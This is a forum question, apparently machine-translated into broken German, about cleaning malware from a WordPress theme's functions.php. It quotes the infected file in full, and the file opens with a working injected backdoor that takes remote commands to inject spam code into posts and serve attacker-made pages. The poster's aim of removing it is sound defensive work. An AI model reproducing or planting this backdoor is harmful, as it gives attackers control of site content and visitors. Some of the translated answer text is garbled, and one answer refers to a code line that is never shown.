How to get rid von “SiteLock-PHP-FILEHACKER.INOFFIZIELLE" in WordPress functions.php
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
}
die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '<!DOCTYPE html>';
print '<html ';
language_attributes();
print ' class="no-js">';
print '<head>';
print '<title>'.stripslashes($data -> title).'</title>';
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
print '<meta name="robots" content="index, follow" />';
print '<meta charset="';
bloginfo( 'charset' );
print '" />';
print '<meta name="viewport" content="width=device-width">';
print '<link href="http://gmpg.org/xfn/11">';
print '<link href="';
bloginfo( 'pingback_url' );
print '">';
wp_head();
print '</head>';
print '<body>';
print '<div id="content" class="site-content">';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}
exit;
}
?><?php
/*
Our portfolio: http://themeforest.net/user/tagDiv/portfolio
Thanks for using our theme!
tagDiv - 2016
*/
/**
* Load the speed booster framework + theme specific files
*/
//load the deploy mode
require_once('td_deploy_mode.php');
//load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10
//load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');
require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); //widgets
/*
* mobile theme css generator
* in wp-admin the main theme is loaded and the mobile theme functions are not included
* required in td_panel_data_source
* @todo - look for a more elegant solution(ex. generate the css on request)
*/
require_once('mobile/includes/td_css_generator_mob.php');
/* ----------------------------------------------------------------------------
* Woo Commerce
*/
//breadcrumb
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');
function td_woocommerce_breadcrumbs() {
return array(
'delimiter' => ' <i class="td-icon-right td-bread-sep"></i> ',
'wrap_before' => '<div class="entry-crumbs" itemprop="breadcrumb">',
'wrap_after' => '</div>',
'before' => '',
'after' => '',
'home' => _x('Home', 'breadcrumb', 'woocommerce'),
);
}
//use own pagination
if (!function_exists('woocommerce_pagination')) {
//pagination
function woocommerce_pagination() {
echo td_page_generator::get_pagination();
}
}
//Override theme default specification for product 3 per row
//Number of product per page 8
add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));
if (!function_exists('woocommerce_output_related_products')) {
//Number of related products
function woocommerce_output_related_products() {
woocommerce_related_products(array(
'posts_per_page' => 4,
'columns' => 4,
'orderby' => 'rand',
)); //Display 4 products in rows of 1
}
}
/* ----------------------------------------------------------------------------
* bbPress
*/
//change avatar size to 40px
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
$author_avatar = '';
if ($size == 14) {
$size = 40;
}
$topic_id = bbp_get_topic_id( $topic_id );
if ( !empty( $topic_id ) ) {
if ( !bbp_is_topic_anonymous( $topic_id ) ) {
$author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );
} else {
$author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );
}
}
return $author_avatar;
}
add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);
//add_action('shutdown', 'test_td');
function test_td () {
if (!is_admin()){
td_api_base::_debug_get_used_on_page_components();
}
}
/**
* tdStyleCustomizer.js is required
*/
if (TD_DEBUG_LIVE_THEME_STYLE) {
add_action('wp_footer', 'td_theme_style_footer');
//new live theme demos
function td_theme_style_footer() {
?>
<div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
<div class="td-skin-body">
<div class="td-skin-wrap">
<div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
<div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
<div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
<div class="td-skin-container td-skin-content">
<div class="td-demos-list">
<?php
$td_demo_names = array();
foreach (td_global::$demo_list as $demo_id => $stack_params) {
$td_demo_names[$stack_params['text']] = $demo_id;
?>
<div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div>
<?php } ?>
<div class="clearfix"></div>
</div>
</div>
<div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
</div>
</div>
<div class="clearfix"></div>
<div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div>
<div class="td-screen-demo" data-width-preview="380"></div>
<div class="td-screen-demo-extend"></div>
</div>
<?php
}
}
//print_r(td_global::$all_theme_panels_list);
Meinem hosting-virus scanner-erkennt, dass es ist ein virus im Thema function.php Datei. Nicht wissen, wie löschen Sie den code, ohne Einfluss auf die website. Bitte helfen Sie mir bei der Beseitigung der bösartigen virus-code " SiteLock-PHP-FILEHACKER.INOFFIZIELLE " aus dieser functions.php
Möglich, Duplikat der functions.php infiziert durch siteLock-php-Injektor, wie es zu reinigen?
Nein, das ist nicht die Frage zu lösen, habe ich
Nein, das ist nicht die Frage zu lösen, habe ich
InformationsquelleAutor Swapna Rani | 2017-01-20
Du musst angemeldet sein, um einen Kommentar abzugeben.
Ich habe gekämpft, mit dieser Art von virus und was ich getan habe, um es zu lösen war:
Alles zu analysieren, das Verzeichnis
Basierend auf den infizierten Dateien öffnen Sie mit vim oder nano zu verwenden, und Sie sollten sehen, die Injektion auch direkt löschen und die Datei sollte ok sein
Wiederholen Sie den Vorgang für alle infizierten Dateien, einige von Ihnen sind .zip-Datei an, die importiert wurden, indem Sie den virus löschen Sie diese und halten Sie die Dateien, die Sie ursprünglich hatte.
Als Empfehlung, Sie sollten Ihre plugins und themes aktualisiert
Hoffe, es funktioniert, ist es vielleicht nicht die effizientere Methode, aber es funktionierte für mich.
InformationsquelleAutor reeyhdz
Diese Viren hinzufügen einer Zeile code in die meisten Ihrer Dateien, werden diese Dateien als betroffene Dateien.
In meinem Fall die betroffenen Dateien haben gemeinsame Linie :
Wenn Sie entfernen Sie diese Zeile aus all diesen Dateien, Sie sind frei von virus/malware-Infektion.
InformationsquelleAutor Jay Kotecha